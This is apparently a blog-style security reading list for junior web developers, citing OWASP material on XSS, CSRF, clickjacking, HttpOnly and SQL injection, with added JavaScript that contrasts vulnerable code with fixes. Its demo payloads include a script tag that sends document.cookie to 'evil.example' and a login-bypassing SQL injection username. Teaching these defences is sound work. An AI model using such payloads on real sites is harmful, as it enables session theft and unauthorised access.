This is a small list of vulnerabilities, links and books which help junior developers learn security. The knowledge came to me bit by bit. I only learned about "OWASP" by accident, after seven months of work. I learned about the "rainbow table" when I was reading "Learning NodeJS". Many programmers don't know about the "HttpOnly" flag although they have more than a year of development experience. Why is this happening? This is not an article. I won't explain "race conditions" or any other specific vulnerability or anything else... The goal of this list is that you will see links and books which you can read. I want to save your time. Do you know what "vulnerability scanner" means? No? Then you can read about it here. Now you have heard about "vulnerability scanner", you have read about "vulnerability scanner" and maybe you will use it in the future. This is awesome! My goal was achieved!
The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.
See OWASP: TOP 10, 2013 and the list of all vulnerabilities on the OWASP web site.
A critical bug allowing code execution on the server occurs in one third of applications, but simple things such as XSS are almost always present.
-- Egor Homakov
Articles about XSS:
- XssAttacks
- OWASP: XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
- SecurityHeaders: X-XSS-Protection
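The main defence in the OWASP cheat sheet above is encoding untrusted data for the HTML context it is written into. Here is an added example (my own code, not from any of the linked pages) that shows a comment renderer which reflects input as-is next to one that encodes it; the payloads are constructed and the `hasInjectedMarkup` helper is only a crude demo check, not a real XSS scanner:

```javascript
// Added example: HTML output encoding against reflected/stored XSS.

// Encode the characters that can break out of HTML text and attribute
// values. Apply to every untrusted value that lands inside HTML.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: author and comment go straight into the markup.
function renderCommentVulnerable(author, comment) {
  return `<p class="comment" data-author="${author}">${comment}</p>`;
}

// Fixed: every untrusted value is encoded for the context it is placed in
// (attribute value and element body both use the same table here).
function renderCommentSafe(author, comment) {
  return `<p class="comment" data-author="${escapeHtml(author)}">${escapeHtml(comment)}</p>`;
}

// Constructed attacker input: a script tag for the body context and an
// attribute break-out for the attribute context.
const payloadBody = '<script>location="https://evil.example/?c="+document.cookie</script>';
const payloadAttr = '" onmouseover="alert(1)';

// Demo-only check: a raw <script tag, or a quote closing an attribute
// followed by an on* event handler, means the payload became markup.
function hasInjectedMarkup(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=/i.test(html);
}
```

Note that encoding is context dependent: the table above is right for HTML body and quoted attribute values, but data placed into a `<script>` block, a URL or a CSS value needs a different encoder (see the cheat sheet's per-context rules).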
Servers should not rely on client-side validation. Client-side validation can be intentionally bypassed by hostile users, and unintentionally bypassed by users of older user agents or automated tools that do not implement these features. The constraint validation features are only intended to improve the user experience, not to provide any kind of security mechanism.
So don't forget about backend validation!
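Added example (my own code, not from the HTML spec or any book above): the HTML5 constraints of a sign-up form, re-checked on the server, because anyone with curl can submit a body that ignores `required`, `maxlength`, `pattern`, `min` and `max`. The form and both request bodies are constructed for the demo:

```javascript
// Added example: server-side validation mirroring client-side constraints.
//
// The form (constructed) looks like this in the browser:
//   <input name="username" required maxlength="20" pattern="[a-z0-9_]+">
//   <input name="email"    required type="email">
//   <input name="age"      required type="number" min="13" max="120">

const USERNAME_RE = /^[a-z0-9_]+$/;
// Deliberately simple address shape; full RFC 5322 syntax is not the point here.
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// Validate a parsed request body (plain object, values as strings from a
// form or JSON). Returns a list of error messages; empty means acceptable.
function validateSignup(body) {
  const errors = [];
  const username = typeof body.username === 'string' ? body.username : '';
  const email = typeof body.email === 'string' ? body.email : '';
  const ageRaw = typeof body.age === 'string' || typeof body.age === 'number' ? String(body.age) : '';

  // required + maxlength + pattern
  if (username.length === 0) errors.push('username: required');
  else if (username.length > 20) errors.push('username: longer than 20 characters');
  else if (!USERNAME_RE.test(username)) errors.push('username: only a-z, 0-9 and _ allowed');

  // required + type="email"
  if (email.length === 0) errors.push('email: required');
  else if (email.length > 254 || !EMAIL_RE.test(email)) errors.push('email: not a valid address');

  // type="number" min/max becomes an integer range check
  if (!/^\d+$/.test(ageRaw)) errors.push('age: must be a whole number');
  else {
    const age = Number(ageRaw);
    if (age < 13 || age > 120) errors.push('age: must be between 13 and 120');
  }
  return errors;
}

// Constructed requests: one as a browser would send it after passing the
// HTML constraints, one sent directly with the constraints ignored.
const fromBrowser = { username: 'alice_01', email: 'alice@example.com', age: '30' };
const fromCurl = { username: '<script>alert(1)</script>'.repeat(3), email: 'not-an-email', age: '-1' };
```

The server copy of each rule is the one that counts; the client copy only saves the user a round trip.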
Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
-- OWASP: CSRF
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
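Added example (my own code, not from OWASP or any book above): the same login lookup built by string concatenation, which is injectable, and built as a parameterised query, which is not. The `?` placeholder style is what drivers such as mysql2 and better-sqlite3 accept; no database connection is made, the functions only return what would be handed to the driver, and `passwordCheckSurvives` is a demo helper, not a SQL parser:

```javascript
// Added example: SQL injection via concatenation vs. a parameterised query.

// Vulnerable: user input becomes part of the SQL text, so quotes and
// comment markers in it change the structure of the statement.
function loginQueryVulnerable(username, password) {
  return {
    sql: `SELECT id FROM users WHERE username = '${username}' AND password = '${password}'`,
    params: [],
  };
}

// Fixed: the SQL text is a constant and the input travels separately as
// data, so the DBMS never parses it as SQL. (Hashing the password is a
// separate topic, see "Safely Storing Passwords" below.)
function loginQuerySafe(username, password) {
  return {
    sql: 'SELECT id FROM users WHERE username = ? AND password = ?',
    params: [username, password],
  };
}

// Demo helper: drop a trailing "--" comment the way the DBMS would and
// see whether the password condition is still part of the statement.
function passwordCheckSurvives(sql) {
  const withoutComment = sql.replace(/--.*$/m, '');
  return /AND password = /.test(withoutComment);
}

// Constructed attacker input: closes the username literal and comments out
// the rest of the WHERE clause, so the lookup succeeds for admin with any
// password.
const injectedUsername = "admin' -- ";
```

Usage: `db.execute(q.sql, q.params)` (mysql2 style) with `q = loginQuerySafe(req.body.username, req.body.password)`. Escaping functions are a weaker substitute for placeholders and are easy to forget once; placeholders make the mistake impossible to express.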
- Wiki
- Learning NodeJS (see the chapter "Guards at the Gate", subchapter "Safely Storing Passwords")
- OWASP: PHP_security_cheatsheet
- OWASP: Ruby_on_Rails_cheatsheet
- RailsGuides: Ruby_on_Rails_security_guide
- The Tangled Web
- The Web Application Hacker's Handbook
- PHP and MySQL Web Development (see the chapter "E-commerce Security Issues")